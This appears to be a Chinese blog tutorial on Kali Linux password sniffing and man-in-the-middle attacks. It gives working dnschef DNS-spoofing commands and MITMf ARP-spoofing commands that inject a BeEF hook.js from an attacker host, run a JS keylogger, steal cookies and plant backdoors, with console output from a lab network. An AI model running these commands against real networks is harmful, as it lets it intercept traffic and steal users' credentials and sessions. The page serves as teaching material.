kalibiubiubiu
kalibiubiubiu

密码嗅探、中间人攻击

密码嗅探                                                           

DNS欺骗代理                                                        

    - dnschef --fakeip=1.1.1.10 --                                  

      fakedomains=www.google.com,www.youtube.com --interface 1.1.1.2

      -q                                                            

将被害者DNS指向伪造的DNS服务器

root@k:~# dnschef --fakeip=192.168.1.1 --fakedomains=www.google.com,www.youtube.com --interface 192.168.1.110 -q

[+] DNSChef started on interface: 192.168.1.110

[+] Using the following nameservers: 8.8.8.8

[+] Cooking A replies to point to 192.168.1.1 matching: www.google.com

[+] Cooking A replies to point to 192.168.1.1 matching: www.youtube.com,www,goole.com

root@k:~# netstat -pantu | grep :53

udp        0       0 192.168.1.110:53         0.0.0.0:*                2073/python

把win7的DNS地址改为: 192.168.1.110

wireshark Network Analyzer

host 192.168.1.111

中间人攻击                                                                     

注入XSS                                                                        

    - 即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码                

    - 一旦得手,影响范围巨大                                                    

    - 如果中间人发生在运营商线路上,很难引起用户注意                            

Mitmf                                                                           

    - 曾经号称最好用的中间人攻击工具(kali 2.0后默认未安装)                    

    - apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-

      queue-dev libssl-dev libipeq-dev libxml2-dev libxslt1-dev libcapstone3    

      libcapstone-dev libffi-dev file                                           

    - apt-get install mitmf                                                     

    - pip uninstall twisted                                                     

    - wget http://twistedmatrix.com/Release/Twisted/15.5/Twisted-15.5.0.tar.bz2

    - pip install ./Twisted-15.5.0.tar.bz2

root@k:~# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libipeq-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file

root@k:~# apt-get install mitmf

root@k:~# pip uninstall twisted

root@k:~# wget http://twistedmatrix.com/Release/Twisted/15.5/Twisted-15.5.0.tar.bz2

root@k:~# pip install ./Twisted-15.5.0.tar.bz2

root@k:~# mitmf

中间人攻击                                                                   

启动beef                                                                     

    - cd /usr/share/beef-xss/                                                 

    - ./beef                                                                  

mitmf中间人注入xss脚本                                                       

    - mitmf --spoof --arp -i eth0 --gateway 1.1.1.1 --target 1.1.1.2 --inject

      --js-url http://1.1.1.3:3000/hook.js                                    

    - mitmf --spoof --arp -i eth0 --gateway 192.168.20.2 --target             

      192.168.20.1 --jskeylogger                                              

    - --upsidedownternet、--screen(/var/log/mitmg)                            

    - --ferretng(cookie)、--browserprofiler(浏览器及插件信息)                 

    - --smbtrap、--smbauth(不演示)

root@k:~# cd /usr/share/beef-xss/

root@k:/usr/share/beef-xss# ls

arerules  beef  beef_cert.pem  beef_key.pem  config.yaml  core  db  extensions  Gemfile  Gemfile.lock  modules

root@k:/usr/share/beef-xss# ./beef

root@k:/usr/share/beef-xss# openvas-stop

Stopping Openvas Services

root@k:/usr/share/beef-xss# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject --js-url http://192.168.1.110:3000/hook.js

[+] MITMF v0.9.8 - 'The Dark Side'

|_ Inject v0.4

|_ Spoof v0.6

|  |_ ARP spoofing enabled

|

|

|_ Sergio-Proxy v0.2.1 online

|_ SSLstrip v0.9 by Moxie Marlinspike online

|

|_ Net-Creds v1.0 online

|_ MITMF-API online

 * Running on http://127.0.0.1:9999/ (Press CTPL+C to quit)

|_ HTTP server online

|_ DNSChef v0.4 online

|_ SMB server online

root@k:~#  mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --jskeylogger

//键盘记录

root@k:~#  mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --upsidedownternet

//图片转180度

root@k:~#  mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --screen

//抓取图片

root@k:~#  mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --ferretng

//抓取cookie

root@k:~#  mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --browserprofiler

//浏览器及插件信息

中间人攻击                                                    

--hsts                                                        

    - HTTP Strict Transport Security                          

    - 防止协议降级、cookie窃取                                

    - 安全策略通过HTTP响应头" Strict-Transport-Security "实施

    - 限制user-agenthttps等                                 

                                                              

--filepwn                                                     

    - 凌空插后门

你可能感兴趣的:(密码嗅探、中间人攻击)

  • Spring Cloud Security 实战,退出登录时如何借助外力使JWT令牌失效? 敲代码的程序狗 Java程序员java程序员springcloudspring
    今天这篇文章介绍一下如何在修改密码、修改权限、注销等场景下使JWT失效。文章的目录如下:解决方案JWT最大的一个优势在于它是无状态的,自身包含了认证鉴权所需要的所有信息,服务器端无需对其存储,从而给服务器减少了存储开销。但是无状态引出的问题也是可想而知的,它无法作废未过期的JWT。举例说明注销场景下,就传统的cookie/session认证机制,只需要把存在服务器端的session删掉就OK了。但
  • 【网络安全】使用mbedtls 实现 RSA 签名、验签、加密、解密 亿码归一码 网络安全web安全安全
    简介mbedtls(前身是PolarSSL)是一个开源、轻量级的SSL/TLS库,专为嵌入式系统和资源受限环境设计。RSA是一种广泛应用的非对称加密算法,是公开密钥密码体制(PublicKeyCryptosystem)的一个典型代表,它的核心特点是采用一对密钥,分别是公开密钥(PublicKey)和私有密钥(PrivateKey)。相关头文件#include#include#include#inc
  • 解锁健康密码,拥抱养生生活 yy0821yy 生活
    在这个快节奏的时代,健康养生已从一种小众爱好转变为大众追求高品质生活的关键途径。它如同一张细密的网,贯穿于饮食、运动、作息及心理等生活的方方面面,对我们的健康状态有着深远影响。饮食养生是构筑健康大厦的基石。秉持“食不厌精,脍不厌细”的理念,注重食材的多样性。粗粮富含膳食纤维,像燕麦、糙米等,能促进肠道蠕动,预防便秘,堪称肠道的“清道夫”。新鲜蔬果更是养生餐桌上的主角,柑橘类水果富含维生素C,能增强
  • 计算机网络:利用分组嗅探器分析传输层与网络层协议 20230921 计算机网络实验计算机网络
    目录实验内容实验目的实验预备知识实验过程描述实验一:对传输层协议TCP/UDP进行捕包分析实验二:对网络层协议IP进行捕包分析实验结果实验一:对传输层协议TCP/UDP进行捕包分析结果如下:实验二:对网络层协议IP进行捕包分析结果如下实验当中问题及解决办法实验内容利用分组嗅探器分析传输层与网络层协议实验目的了解传输层TCP/UDP协议构造;了解网络层IP协议构造;实验预备知识TCP段结构UDP段结
  • 财务管理核心知识深度剖析 阿贾克斯的黎明 基础学科学习
    目录财务管理核心知识深度剖析一、财务指标计算:企业财务状况的量化洞察二、成本计算方法:企业成本管控的核心策略三、财务分析方法:解读企业财务密码的钥匙在华为财经笔试的知识体系中,第二章财务管理核心知识是重中之重,它涵盖了从基础指标计算到复杂分析方法、预算管理、资金与投资决策以及风险把控等多方面内容,对企业的财务运营和决策起着关键作用。深入理解这些知识,不仅有助于在笔试中取得优异成绩,更能为实际的财务
  • 《黑客攻防从入门到精通:工具篇》全15章万字深度总结——从工具解析到实战攻防,构建完整网络安全知识体系 予安灵 黑客技术web安全安全系统安全网络安全安全架构网络攻击模型黑客工具链
    目录一、书籍核心逻辑与学习路径二、核心模块与工具深度解析模块1:信息收集与网络扫描模块2:渗透测试与漏洞利用模块3:密码攻防与身份认证模块4:恶意程序攻防模块5:网络追踪与反追踪模块6:系统加固与数据防护三、工具链实战方法论第一章:黑客必备小工具第二章:扫描与嗅探工具第三章:注入工具(诸如工具)第四章:密码攻防工具第五章:病毒攻防常用工具第六章:木马攻防常用工具第七章:网游与网吧攻防工具第八章:黑
  • 订单管理系统 大学生数据库大作业/数据库实践MYSQL 陌路物是人非 数据库课程设计
    订单管理系统从入门到入土下载Maven,Nodejs创建一个数据库sql_end,创建四个数据库表,并确保用户名为root用户密码为123456再IDEA中加载Springboot依赖(可以直接新建一个任意名称的文件夹,项目导入spring的框架),启动spring项目打开index.html输入用户名和密码,点击注册,再点击登录点击个人中心,点击修改用户信息,修改自己的余额点击逛店铺,选择一个商
  • 程序调用Sql Server存储过程超时,但是数据库执行存储过程无异常的问题剖析 .Net 爱好者 c#.net.netcore
    在前端程序调用存储过程时出现执行超时,而直接在数据库中执行存储过程没有问题,这种情况可能与以下几个因素有关:1.查询计划缓存和参数嗅探SQLServer会为存储过程生成并缓存查询计划,以便在后续执行时提高性能。然而,查询计划是基于第一次执行时的参数生成的,这被称为“参数嗅探”。如果第一次执行时的参数与后续执行时的参数差异较大,可能会导致不适合的查询计划,从而影响性能。重新编译存储过程会使SQLSe
  • Linux 找回 Root 密码(多发行版本) 可问 可问春风 Linux从新手到入门linuxchrome运维
    适用于大多数Linux发行版(Ubuntu、CentOS、Debian等),无需第三方工具,需物理接触服务器或系统启动权限。步骤1:重启系统并进入GRUB引导菜单重启系统,看到启动画面时,快速按下Esc、Shift或E(不同系统按键不同,可多试几次)。进入GRUB菜单后,选择要修改的系统内核选项(通常第一个),按e进入编辑模式。步骤2:修改内核启动参数找到以linux或linux16或linuxe
  • SSL的原理和应用 m0_74092749 ssl网络协议网络
    前言:SSL协议便是Internet上应用最为广泛的网络数据安全传输协议。SSL协议隶属于会话层,处于有连接的会话层之上,它一经产生就在Internet领域发挥了它的巨大作用。目前,国外著名的商用浏览器和Web服务器都支持SSL协议,SSL已成为最流行的WWW安全协议。目前已经有若干国外厂商推出了基于SSL的安全产品,但是协议在核心密码算法上都有出口限制,大多采用一些低安全强度的算法,而且协议代码
  • 2025年Python生态全景:从AI霸主到量子计算,揭秘其不可替代的技术魅力 南玖yy python人工智能量子计算
    在2025年的技术浪潮中,Python凭借其极简的语法、庞大的生态系统以及跨领域融合能力,依然稳坐编程语言界的“头把交椅”。尽管Java等语言在AI领域发起挑战,但Python通过持续的技术革新和生态扩展,展现出不可撼动的生命力。本文将从技术趋势、行业应用与未来挑战三个维度,解析Python的“常青”密码。一、AI领域的持续主导:生态优势与工具革新Python在AI领域的统治地位仍未动摇。尽管有观
  • 设计模式系列开篇:解锁软件设计的智慧密码 Ti笔记 设计模式java开发语言
    在软件开发的世界里,我们常常会遇到这样一些问题:如何让代码更加优雅、可维护?如何在需求不断变化的情况下快速响应?如何让团队协作更加高效?这些问题看似复杂,但其实早已有人为我们提供了答案,那就是——设计模式。一、设计模式是什么?设计模式(DesignPattern)是软件设计中的一种通用解决方案,它是一种经过验证、可复用的代码设计模板,用于解决特定场景下的常见问题。设计模式并不是一段具体的代码,而是
  • 密码学概述及其发展简史 【一】 smilejiasmile #密码学及其区块链应用密码学古典密码
    1密码学1.1什么是密码学密码学是保障信息安全的核心技术,信息安全是密码学研究与发展的主要动力和目的。密码学能做什么?机密性:如何使得某个数据自己能看懂,别人看不懂认证:如何确保数据的正确来源,如何保证通信实体的真实性完整性:如何确保数据在传输过程中没有被删改不可否认性:如何确保用户行为的不可否认性密码算法密码算法的基本概念和术语包括:明文(M)、密文©、密钥(k秘密参数)、加密(E)、解密(D)
  • 2024 年真实世界密码学会议 红云谈安全 网络安全这些事网络安全网络
    今年的真实世界密码学会议最近在加拿大多伦多举行。与往常一样,由IACR组织的这次会议在为期三天的演讲中展示了当前密码学主题的最新学术成果和行业观点。会议前后还举办了许多同期活动,包括FHE.org会议、真实世界后量子密码学(RWPQC)研讨会和高可信加密软件(HACS)研讨会。今年,NCCGroup的密码服务团队的许多成员都参加了会议和几场研讨会。本文总结了我们最喜欢的一些演讲和要点。后量子密码学
  • 人大预算联网监督系统 前端产品产品设计
    人大财政预算联网监督是建立和完善中国特色社会主义预算审查监督制度的有益探索,是贯彻实施预算法,加强对政府全口径预算决算审查监督,推动实施全面规范、公开透明预算制度的客观需要,是对人大预算审查监督工作的创新发展。项目地址:Github、国内Gitee演示地址:http://silianpan.cn/bss/以下是演示角色和账号(密码同账号):超级管理员:seal_adminXXX市人大管理员:xxx
  • Linux安全与密钥登录指南 gkfkfhk linux安全运维
    目录Linux安全概述密钥登录的配置生成密钥对配置SSH密钥登录查看登录日志限制IP访问设置IP封禁允许特定IP访问查看系统可登录的账号1.Linux安全概述Linux系统安全主要依赖于控制访问权限、监控异常行为以及进行安全配置。通过适当的登录方式和访问限制,可以有效避免未经授权的访问。密钥登录是一种更安全的认证方式,避免了明文密码的风险。而登录日志和IP限制则可以帮助我们识别和防御潜在的入侵。2
  • 非对称加密算法——SIDH加密算法 java
    JavaSIDH算法解析理论背景1.1后量子密码学随着量子计算机的发展,传统公钥密码体系(如RSA、ECC)面临被Shor算法破解的风险。后量子密码学(Post-QuantumCryptography)研究能够抵御量子攻击的新型加密算法,主要包含以下类型:基于格的密码学基于编码的密码学多元多项式密码学基于超奇异椭圆曲线同源的密码学(SIDH)1.2椭圆曲线基础SIDH基于超奇异椭圆曲线及其同源映射
  • Ook密码快速辨认与解密 迷茫&&前行 密码解密Ook密码
    一.Ook在线解密网站Ook解密1Ook解密2二.Ook密码辨认Ook密码是一种基于Ook语言的编程语言,由DavidMorgan-Mar设计,灵感来自TerryPratchett的《碟形世界》系列中的猩猩语言。其特点如下:极简语法:仅包含三个基本符号:Ook.、Ook?、Ook!,通过不同组合表达指令。基于Brainfuck:Ook密码与Brainfuck一一对应,每个Ook指令对应一个Brai
  • 【SpringMVC】常用注解:@RequestBody 字节源流 java开发语言
    1.作用用于获取请求实体内容,直接使用得到的是key=value&key=value的数据。获取请求实体内容不适用get请求。2.属性required描述是否有请求体,默认值为true。当取值为true时,get请求方式会报错。如果取值为false,get请求得到的是null。3.示例先编写jsp代码用户名称:用户密码:用户年龄:然后编写控制器代码@RequestMapping("useReque
  • Windows域渗透之域管理 人间酒中仙 红队笔记之域渗透windows笔记学习网络安全域渗透红队笔记
    Windows域管理一、使用组策略进行软件分发1、操作步骤2、PowerShell命令示例二、配置组策略(GPO)设置1、设置密码策略2、禁用USB存储设备三、批量用户管理1、创建单个用户2、批量导入用户四、部署和管理共享驱动器1、使用组策略登录脚本自动映射驱动器2、使用PowerShell映射网络驱动器五、管理Windows更新1、使用组策略配置自动更新2、使用PowerShell管理Windo
  • 数字隐形盾牌:日常场景下的网络安全实践 安全防护
    一、网络威胁:潜伏在屏幕后的"数字劫匪"2025年全球每11秒发生一次勒索攻击,每天新增45万个钓鱼网站,你的手机里可能正躺着3-5个高危漏洞。这些数据揭示了一个残酷现实:我们正生活在一个"数字丛林时代"。三大致命威胁:钓鱼攻击升级版:骗子不仅伪造银行邮件,现在会克隆公司高管的微信,用AI模仿老板声音要求转账**Wi-Fi陷阱:**商场免费Wi-Fi可能在15秒内窃取你的支付密码,机场充电桩可能成
  • 【忍者算法】从找朋友到找变位词:一道趣味字符串问题的深入解析|LeetCode 438 找到字符串中所有字母异位词 忍者算法 忍者算法LeetCode题解秘籍leetcode算法职场和发展面试跳槽
    LeetCode438找到字符串中所有字母异位词点此看全部题解LeetCode必刷100题:一份来自面试官的算法地图(题解持续更新中)生活中的算法还记得小时候玩的"找朋友"游戏吗?每个人都有一个字母牌,需要找到拥有相同字母组合的伙伴。比如,拿着"ate"的同学要找到拿着"eat"或"tea"的同学。这其实就是在寻找字母异位词!在实际应用中,字母异位词的检测有着广泛的用途。比如在密码学中检测可能的密
  • 非对称加密:SSL/TLS握手的数学基石 安全
    1.密钥交换的密码学困局在未加密的HTTP通信中,攻击者可通过中间人攻击(MITM)窃听或篡改数据。SSL/TLS协议的核心挑战在于:如何在不安全的信道上建立安全通信?这本质上是一个“密钥分发问题”——若使用对称加密(如AES),双方需要共享同一密钥,但密钥本身如何安全传递?非对称加密的突破性在于公钥与私钥的分离。以RSA算法为例,其数学基础是大质数分解难题:选择两个大质数p和q(通常≥2048位
  • 短视频时代,普通人如何保护个人隐私?——从SSL证书看数据安全 安全
    在短视频时代,每天数以亿计的用户上传内容、互动评论、甚至进行直播购物。然而,这些行为背后潜藏着隐私泄露的风险:账号密码被盗、支付信息被窃取、个人数据遭篡改……如何在这些场景中保护隐私?SSL证书作为互联网安全的基石,正扮演着关键角色。本文将从技术原理到实践建议,为你揭开SSL证书如何成为隐私保护的“隐形盾牌”。一、SSL证书:隐私保护的第一道防线SSL(SecureSocketsLayer)证书是
  • Python通过SSH隧道访问数据库 Java菜鸟在北京 pythonsshtunnelparamikoSSH隧道访问数据库
    本文介绍通过sshtunnel类库建立SSH隧道,使用paramiko通过SSH来访问数据库。实现了两种建立SSH方式:公私钥验证、密码验证。公私钥可读本地,也可读取AwsS3上的私钥文件。本质上就是在本机建立SSH隧道,然后将访问DB转发到本地SSH内去访问数据库。简单易懂,上代码:fromsshtunnelimportSSHTunnelForwarderfromsqlalchemyimport
  • redis基础常用命令 web15085096641 面试学习路线阿里巴巴redis数据库缓存
    linux下搜索redis-cli所在路径find/-nameredis*cd到redis-cli所在路径停止redisredis-cli-h127.0.0.1-p6379shutdown查看redis启动使用的配置文件127.0.0.1:6379>infoServer启动redis-server/指定配置文件路径/redis.conf配置守护进程daemonizeyes配置密码requirepa
  • 忘记rar、zip压缩包密码?教你简单方法快速解锁! jiemidashi 经验分享
    找回压缩包密码从未如此简单。您只需两步,便可以轻松解密RAR或ZIP文件。具体步骤如下:第一步,打开网页浏览器,在地址栏输入:文件密码.top进入网站。这个网站无需下载软件,操作非常简单,支持各种类型的文件,包括RAR/ZIP压缩包、Word文档、Excel表格、PDF文档、WPS表格文档和PPT演示文稿。第二步,点击“立即开始”,上传您的压缩文件。耐心等待片刻,网站会处理您的请求,快速为您找回密
  • Java SSLSocket TLS 1.3示例 cyan20115 java数据库网络
    该Java11JEP332添加了对TLS1.3协议的支持。SSLSocket+TLS1.3具有TLS1.3协议和TLS_AES_128_GCM_SHA256流密码的SSLSocket客户端,用于将请求发送到https://google.com并打印响应。JavaTLS13.javapackagecom.mkyong.java11.jep332;importjavax.net.ssl.SSLSock
  • 密码学 网络安全 科普 网络安全密码技术 黑客-秋凌 密码学web安全安全
    网络加密包括密码技术和网络加密方法两个方面。一、密码技术密码技术一般分为常规密码和公钥密码。常规密码是指收信方和发信方使用相同的密钥,即加密密钥和解密密钥是相同或等价的。比较著名的常规密码算法有DES及其各种变形、IDEA、FEAL、Skipjack、RC4、RC5等。在众多的常规密码中影响最大的是DES密码。常规密码的优点是有很强的保密强度,且能经受住时间的检验和攻击,但其密钥必须通过安全的途径
  • C#实现AES-CBC加密工具类(含完整源码及使用教程) WangMing_X C#实现各种功能工具集c#AES-CBC加密
    一、AES-CBC加密应用场景AES(AdvancedEncryptionStandard)作为全球公认的安全加密标准,广泛使用在以下场景:API通信加密:保护HTTP接口传输的敏感数据(如身份令牌、支付信息)文件安全存储:加密本地配置文件、数据库连接字符串等用户隐私保护:加密存储密码、身份证号等PII(个人身份信息)跨平台数据交换:与Java/Python等其他语言实现的加密系统互通物联网设备通
  • PHP,安卓,UI,java,linux视频教程合集 cocos2d-x小菜 javaUIlinuxPHPandroid
    ╔-----------------------------------╗┆                           
  • zookeeper admin 笔记 braveCS zookeeper
      Required Software 1) JDK>=1.6 2)推荐使用ensemble的ZooKeeper(至少3台),并run on separate machines 3)在Yahoo!,zk配置在特定的RHEL boxes里,2个cpu,2G内存,80G硬盘   数据和日志目录 1)数据目录里的文件是zk节点的持久化备份,包括快照和事务日
  • Spring配置多个连接池 easterfly spring
    项目中需要同时连接多个数据库的时候,如何才能在需要用到哪个数据库就连接哪个数据库呢? Spring中有关于dataSource的配置:     <bean id="dataSource" class="com.mchange.v2.c3p0.ComboPooledDataSource"   &nb
  • Mysql 171815164 mysql
    例如,你想myuser使用mypassword从任何主机连接到mysql服务器的话。 GRANT ALL PRIVILEGES ON *.* TO 'myuser'@'%'IDENTIFIED BY 'mypassword' WI TH GRANT OPTION; 如果你想允许用户myuser从ip为192.168.1.6的主机连接到mysql服务器,并使用mypassword作
  • CommonDAO(公共/基础DAO) g21121 DAO
            好久没有更新博客了,最近一段时间工作比较忙,所以请见谅,无论你是爱看呢还是爱看呢还是爱看呢,总之或许对你有些帮助。         DAO(Data Access Object)是一个数据访问(顾名思义就是与数据库打交道)接口,DAO一般在业
  • 直言有讳 永夜-极光 感悟随笔
      1.转载地址:http://blog.csdn.net/jasonblog/article/details/10813313   精华: “直言有讳”是阿里巴巴提倡的一种观念,而我在此之前并没有很深刻的认识。为什么呢?就好比是读书时候做阅读理解,我喜欢我自己的解读,并不喜欢老师给的意思。在这里也是。我自己坚持的原则是互相尊重,我觉得阿里巴巴很多价值观其实是基本的做人
  • 安装CentOS 7 和Win 7后,Win7 引导丢失 随便小屋 centos
    一般安装双系统的顺序是先装Win7,然后在安装CentOS,这样CentOS可以引导WIN 7启动。但安装CentOS7后,却找不到Win7 的引导,稍微修改一点东西即可。 一、首先具有root 的权限。      即进入Terminal后输入命令su,然后输入密码即可 二、利用vim编辑器打开/boot/grub2/grub.cfg文件进行修改 v
  • Oracle备份与恢复案例 aijuans oracle
    Oracle备份与恢复案例 一. 理解什么是数据库恢复当我们使用一个数据库时,总希望数据库的内容是可靠的、正确的,但由于计算机系统的故障(硬件故障、软件故障、网络故障、进程故障和系统故障)影响数据库系统的操作,影响数据库中数据的正确性,甚至破坏数据库,使数据库中全部或部分数据丢失。因此当发生上述故障后,希望能重构这个完整的数据库,该处理称为数据库恢复。恢复过程大致可以分为复原(Restore)与
  • JavaEE开源快速开发平台G4Studio v5.0发布 無為子
      我非常高兴地宣布,今天我们最新的JavaEE开源快速开发平台G4Studio_V5.0版本已经正式发布。   访问G4Studio网站 http://www.g4it.org   2013-04-06 发布G4Studio_V5.0版本 功能新增 (1). 新增了调用Oracle存储过程返回游标,并将游标映射为Java List集合对象的标
  • Oracle显示根据高考分数模拟录取 百合不是茶 PL/SQL编程oracle例子模拟高考录取学习交流
    题目要求: 1,创建student表和result表 2,pl/sql对学生的成绩数据进行处理 3,处理的逻辑是根据每门专业课的最低分线和总分的最低分数线自动的将录取和落选     1,创建student表,和result表 学生信息表; create table student( student_id number primary key,--学生id
  • 优秀的领导与差劲的领导 bijian1013 领导管理团队
    责任 优秀的领导:优秀的领导总是对他所负责的项目担负起责任。如果项目不幸失败了,那么他知道该受责备的人是他自己,并且敢于承认错误。 差劲的领导:差劲的领导觉得这不是他的问题,因此他会想方设法证明是他的团队不行,或是将责任归咎于团队中他不喜欢的那几个成员身上。 努力工作 优秀的领导:团队领导应该是团队成员的榜样。至少,他应该与团队中的其他成员一样努力工作。这仅仅因为他
  • js函数在浏览器下的兼容 Bill_chen jquery浏览器IEDWRext
      做前端开发的工程师,少不了要用FF进行测试,纯js函数在不同浏览器下,名称也可能不同。对于IE6和FF,取得下一结点的函数就不尽相同:   IE6:node.nextSibling,对于FF是不能识别的;   FF:node.nextElementSibling,对于IE是不能识别的; 兼容解决方式:var Div = node.nextSibl
  • 【JVM四】老年代垃圾回收:吞吐量垃圾收集器(Throughput GC) bit1129 垃圾回收
    吞吐量与用户线程暂停时间   衡量垃圾回收算法优劣的指标有两个: 吞吐量越高,则算法越好 暂停时间越短,则算法越好 首先说明吞吐量和暂停时间的含义。   垃圾回收时,JVM会启动几个特定的GC线程来完成垃圾回收的任务,这些GC线程与应用的用户线程产生竞争关系,共同竞争处理器资源以及CPU的执行时间。GC线程不会对用户带来的任何价值,因此,好的GC应该占
  • J2EE监听器和过滤器基础 白糖_ J2EE
    Servlet程序由Servlet,Filter和Listener组成,其中监听器用来监听Servlet容器上下文。 监听器通常分三类:基于Servlet上下文的ServletContex监听,基于会话的HttpSession监听和基于请求的ServletRequest监听。   ServletContex监听器 ServletContex又叫application
  • 博弈AngularJS讲义(16) - 提供者 boyitech jsAngularJSapiAngularProvider
      Angular框架提供了强大的依赖注入机制,这一切都是有注入器(injector)完成. 注入器会自动实例化服务组件和符合Angular API规则的特殊对象,例如控制器,指令,过滤器动画等。   那注入器怎么知道如何去创建这些特殊的对象呢? Angular提供了5种方式让注入器创建对象,其中最基础的方式就是提供者(provider), 其余四种方式(Value, Fac
  • java-写一函数f(a,b),它带有两个字符串参数并返回一串字符,该字符串只包含在两个串中都有的并按照在a中的顺序。 bylijinnan java
    public class CommonSubSequence { /** * 题目:写一函数f(a,b),它带有两个字符串参数并返回一串字符,该字符串只包含在两个串中都有的并按照在a中的顺序。 * 写一个版本算法复杂度O(N^2)和一个O(N) 。 * * O(N^2):对于a中的每个字符,遍历b中的每个字符,如果相同,则拷贝到新字符串中。 * O(
  • sqlserver 2000 无法验证产品密钥 Chen.H sqlwindowsSQL ServerMicrosoft
    在 Service Pack 4 (SP 4), 是运行 Microsoft Windows Server 2003、 Microsoft Windows Storage Server 2003 或 Microsoft Windows 2000 服务器上您尝试安装 Microsoft SQL Server 2000 通过卷许可协议 (VLA) 媒体。 这样做, 收到以下错误信息CD KEY的 SQ
  • [新概念武器]气象战争 comsci
           气象战争的发动者必须是拥有发射深空航天器能力的国家或者组织....        原因如下:        地球上的气候变化和大气层中的云层涡旋场有密切的关系,而维持一个在大气层某个层次
  • oracle 中 rollup、cube、grouping 使用详解 daizj oraclegroupingrollupcube
    oracle 中 rollup、cube、grouping 使用详解 -- 使用oracle 样例表演示 转自namesliu -- 使用oracle 的样列库,演示 rollup, cube, grouping 的用法与使用场景    --- ROLLUP , 为了理解分组的成员数量,我增加了 分组的计数  COUNT(SAL)   
  • 技术资料汇总分享 Dead_knight 技术资料汇总 分享
    本人汇总的技术资料,分享出来,希望对大家有用。 http://pan.baidu.com/s/1jGr56uE 资料主要包含: Workflow->工作流相关理论、框架(OSWorkflow、JBPM、Activiti、fireflow...) Security->java安全相关资料(SSL、SSO、SpringSecurity、Shiro、JAAS...) Ser
  • 初一下学期难记忆单词背诵第一课 dcj3sjt126com englishword
    could 能够 minute 分钟 Tuesday 星期二 February 二月 eighteenth 第十八 listen 听 careful 小心的,仔细的 short 短的 heavy 重的 empty 空的 certainly 当然 carry 携带;搬运 tape 磁带 basket 蓝子 bottle 瓶 juice 汁,果汁 head 头;头部
  • 截取视图的图片, 然后分享出去 dcj3sjt126com OSObjective-C
    OS 7 has a new method that allows you to draw a view hierarchy into the current graphics context. This can be used to get an UIImage very fast. I implemented a category method on UIView to get the vi
  • MySql重置密码 fanxiaolong MySql重置密码
    方法一:  在my.ini的[mysqld]字段加入: skip-grant-tables 重启mysql服务,这时的mysql不需要密码即可登录数据库  然后进入mysql mysql>use mysql;  mysql>更新 user set password=password('新密码') WHERE User='root'; mysq
  • Ehcache(03)——Ehcache中储存缓存的方式 234390216 ehcacheMemoryStoreDiskStore存储驱除策略
    Ehcache中储存缓存的方式   目录 1     堆内存(MemoryStore) 1.1     指定可用内存 1.2     驱除策略 1.3     元素过期 2   &nbs
  • spring mvc中的@propertysource jackyrong spring mvc
      在spring mvc中,在配置文件中的东西,可以在java代码中通过注解进行读取了: @PropertySource  在spring 3.1中开始引入 比如有配置文件 config.properties mongodb.url=1.2.3.4 mongodb.db=hello 则代码中   @PropertySource(&
  • 重学单例模式 lanqiu17 单例Singleton模式
    最近在重新学习设计模式,感觉对模式理解更加深刻。觉得有必要记下来。 第一个学的就是单例模式,单例模式估计是最好理解的模式了。它的作用就是防止外部创建实例,保证只有一个实例。 单例模式的常用实现方式有两种,就人们熟知的饱汉式与饥汉式,具体就不多说了。这里说下其他的实现方式 静态内部类方式: package test.pattern.singleton.statics; publ
  • .NET开源核心运行时,且行且珍惜 netcome java.net开源
    背景 2014年11月12日,ASP.NET之父、微软云计算与企业级产品工程部执行副总裁Scott Guthrie,在Connect全球开发者在线会议上宣布,微软将开源全部.NET核心运行时,并将.NET 扩展为可在 Linux 和 Mac OS 平台上运行。.NET核心运行时将基于MIT开源许可协议发布,其中将包括执行.NET代码所需的一切项目——CLR、JIT编译器、垃圾收集器(GC)和核心
  • 使用oscahe缓存技术减少与数据库的频繁交互 Everyday都不同 Web高并发oscahe缓存
    此前一直不知道缓存的具体实现,只知道是把数据存储在内存中,以便下次直接从内存中读取。对于缓存的使用也没有概念,觉得缓存技术是一个比较”神秘陌生“的领域。但最近要用到缓存技术,发现还是很有必要一探究竟的。   缓存技术使用背景:一般来说,对于web项目,如果我们要什么数据直接jdbc查库好了,但是在遇到高并发的情形下,不可能每一次都是去查数据库,因为这样在高并发的情形下显得不太合理——
  • Spring+Mybatis 手动控制事务 toknowme mybatis
    @Override    public boolean testDelete(String jobCode) throws Exception {       boolean flag = false;  &nbs
  • 菜鸟级的android程序员面试时候需要掌握的知识点 xp9802 android
    熟悉Android开发架构和API调用 掌握APP适应不同型号手机屏幕开发技巧 熟悉Android下的数据存储  熟练Android Debug Bridge Tool 熟练Eclipse/ADT及相关工具  熟悉Android框架原理及Activity生命周期 熟练进行Android UI布局 熟练使用SQLite数据库; 熟悉Android下网络通信机制,S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他